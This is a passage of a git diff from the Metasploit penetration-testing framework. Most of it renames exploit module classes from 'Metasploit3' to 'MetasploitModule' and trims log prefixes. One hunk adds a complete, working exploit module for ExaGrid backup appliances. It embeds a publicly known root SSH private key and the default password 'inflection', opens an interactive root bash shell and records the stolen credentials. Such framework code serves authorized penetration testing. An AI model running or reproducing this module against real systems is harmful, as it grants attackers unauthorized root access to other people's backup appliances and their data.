b/modules/exploits/linux/misc/sercomm_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 7ee164b10b..0826b3cb16 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo #{clue}" connect - vprint_status("#{peer} - Sending 'Command' request...") + vprint_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 - vprint_good("#{peer} - Node ID #{node_id} discovered") + vprint_good("Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retry with the good node_id connect - vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...") + vprint_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ @@ -117,16 +117,16 @@ class Metasploit3 < Msf::Exploit::Remote cmd = payload.encoded connect - print_status("#{peer} - Sending 'Command' request...") + print_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /-1/ and res=~ /NODE (\d*)/ # Retry with the good node_id node_id = $1 - print_good("#{peer} - Node ID #{node_id} discovered") + print_good("Node ID #{node_id} discovered") connect - print_status("#{peer} - Sending 'Command' request with discovered Node ID...") + print_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect end @@ -134,10 +134,10 @@ class Metasploit3 < Msf::Exploit::Remote # Read command output from socket if cmd/unix/generic payload was used if (datastore['CMD']) if res and res =~ /\x30\xad/ - print_good("#{peer} - Command executed successfully") + print_good("Command executed successfully") print_status("Output:\n#{res.split("\x30\xad").last}") else - print_error("#{peer} - Failed to execute the command") + print_error("Failed to execute the command") end end diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 4df096710f..61ad7081f3 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index bd086efcc5..9b6811b040 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index e4a4c225b8..b3e42f2ac6 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 0194930466..6f781a8e47 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/postgres' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 59fc651054..1960848adf 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index bf98f0278a..5552ff0bbc 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index ae73ad1779..5f6e867f48 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index ed72293621..5a9c5dfb6a 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb index b5bbdc6329..8dd9476745 100644 --- a/modules/exploits/linux/samba/setinfopolicy_heap.rb +++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index 63f0fdc1a8..e89a00faea 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb index 2823d626f0..2759efc69c 100644 --- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb +++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index 5cb602e0b1..79540ed980 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp @@ -97,7 +97,7 @@ class Metasploit4 < Msf::Exploit::Remote rescue peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Caught #{$!.class}: #{$!.message}") + vprint_status("Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index 4d77912786..9e343f2aab 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Auxiliary::Report Rank = ExcellentRanking diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb new file mode 100644 index 0000000000..7fc0d39526 --- /dev/null +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -0,0 +1,183 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, { + 'Name' => 'ExaGrid Known SSH Key and Default Password', + 'Description' => %q{ + ExaGrid ships a public/private key pair on their backup appliances to + allow passwordless authentication to other ExaGrid appliances. Since + the private key is easily retrievable, an attacker can use it to gain + unauthorized remote access as root. Additionally, this module will + attempt to use the default password for root, 'inflection'. + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'Author' => ['egypt'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-1560' ], # password + [ 'CVE', '2016-1561' ], # private key + [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + ], + 'DisclosureDate' => "Apr 07 2016", + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + })) + + register_options( + [ + # Since we don't include Tcp, we have to register this manually + Opt::RHOST(), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + # helper methods that normally come from Tcp + def rhost + datastore['RHOST'] + end + def rport + datastore['RPORT'] + end + + def do_login(user) + ssh_options = { + auth_methods: ['publickey', 'password'], + config: false, + disable_agent: true, + key_data: [ key_data ], + msfmodule: self, + msframework: framework, + password: 'inflection', + port: rport, + proxies: datastore['Proxies'], + record_auth_info: true, + } + ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, user, ssh_options) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh_socket + + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) + ssh_socket = nil + + return conn + else + return false + end + end + + # Ghetto hack to prevent the shell detection logic from hitting false + # negatives due to weirdness with ssh sockets. We already know it's a shell + # because auth succeeded by this point, so no need to do the check anyway. + module TrustMeItsAShell + def _check_shell(*args) + true + end + end + + def exploit + payload_instance.extend(TrustMeItsAShell) + + conn = do_login("root") + if conn + print_good "Successful login" + service_data = { + address: rhost, + port: rport, + protocol: 'tcp', + service_name: 'ssh', + workspace_id: myworkspace_id, + } + credential_data = { + username: 'root', + private_type: (conn.ssh.auth_info[:method] == "publickey" ? :ssh_key : :password), + private_data: (conn.ssh.auth_info[:method] == "publickey" ? key_data : 'inflection'), + origin_type: :service, + module_fullname: fullname, + }.merge(service_data) + + core = create_credential(credential_data) + login_data = { + core: core, + last_attempted: Time.now, + }.merge(service_data) + + create_credential_login(login_data) + + handler(conn.lsock) + end + end + + def key_data + <<EOF +-----BEGIN RSA PRIVATE KEY----- +MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10 +hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa +E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA +GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ +BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg +AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y +iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs +Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj +QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz +ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG +XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk +86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y +x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== +-----END RSA PRIVATE KEY----- +EOF + end + +end diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 7a460a0ac6..db95be34b6 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 3a33e74fb0..8ef37218b9 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3a68d2f957..7693de503a 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 83e5191308..e92c624a4f 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 4885234c97..5f107ea05f 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 1665ae8b2d..a5f7d68121 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb index d65f048c33..d806264e2c 100644 --- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb +++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index fe94b76a68..77161f34cc 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb index 445567be76..4bdb568455 100644 --- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb index dcb5f9346a..c3145edd6a 100644 --- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index 1a6ef9ca70..4a3fc784c6 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb index bb4886ba44..78d47028e5 100644 --- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb index f79bc97fd5..3fefc1f43a 100644 --- a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb index 68a671f847..9e3a04a118 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb index 8c833f900e..c5f779aac6 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index b040cd0391..385b64db3e 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 55f244cdda..a3c709311a 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb index 7cf0100b51..0cae78da7e 100644 --- a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb +++ b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 253f4b1b31..a8697b93ed 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proxy_prototype.rb b/modules/exploits/multi/browser/firefox_proxy_prototype.rb index 8da445326f..ff0aa8649d 100644 --- a/modules/exploits/multi/browser/firefox_proxy_prototype.rb +++ b/modules/exploits/multi/browser/firefox_proxy_prototype.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 4511da4250..a78533c60a 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb index 6bfa1dc147..568c9ed1de 100644 --- a/modules/exploits/multi/browser/firefox_svg_plugin.rb +++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb index ad5eda286d..cee613df0d 100644 --- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb +++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_webidl_injection.rb b/modules/exploits/multi/browser/firefox_webidl_injection.rb index 194c1920ba..75d0e62887 100644 --- a/modules/exploits/multi/browser/firefox_webidl_injection.rb +++ b/modules/exploits/multi/browser/firefox_webidl_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index f76342cdbf..5bef4ac4e8 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/itms_overflow.rb b/modules/exploits/multi/browser/itms_overflow.rb index 9fe7bb5ea4..9faaab409d 100644 --- a/modules/exploits/multi/browser/itms_overflow.rb +++ b/modules/exploits/multi/browser/itms_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_atomicreferencearray.rb b/modules/exploits/multi/browser/java_atomicreferencearray.rb index aedfed2fd1..2efbc2544a 100644 --- a/modules/exploits/multi/browser/java_atomicreferencearray.rb +++ b/modules/exploits/multi/browser/java_atomicreferencearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_calendar_deserialize.rb b/modules/exploits/multi/browser/java_calendar_deserialize.rb index 3942291ee4..7d91e8b864 100644 --- a/modules/exploits/multi/browser/java_calendar_deserialize.rb +++ b/modules/exploits/multi/browser/java_calendar_deserialize.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_getsoundbank_bof.rb b/modules/exploits/multi/browser/java_getsoundbank_bof.rb index 3a123768f2..5f9427aae4 100644 --- a/modules/exploits/multi/browser/java_getsoundbank_bof.rb +++ b/modules/exploits/multi/browser/java_getsoundbank_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_jre17_driver_manager.rb b/modules/exploits/multi/browser/java_jre17_driver_manager.rb index b832f9ea9b..8c68bb3eeb 100644 --- a/modules/exploits/multi/browser/java_jre17_driver_manager.rb +++ b/modules/exploits/multi/browser/java_jre17_driver_manager.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include 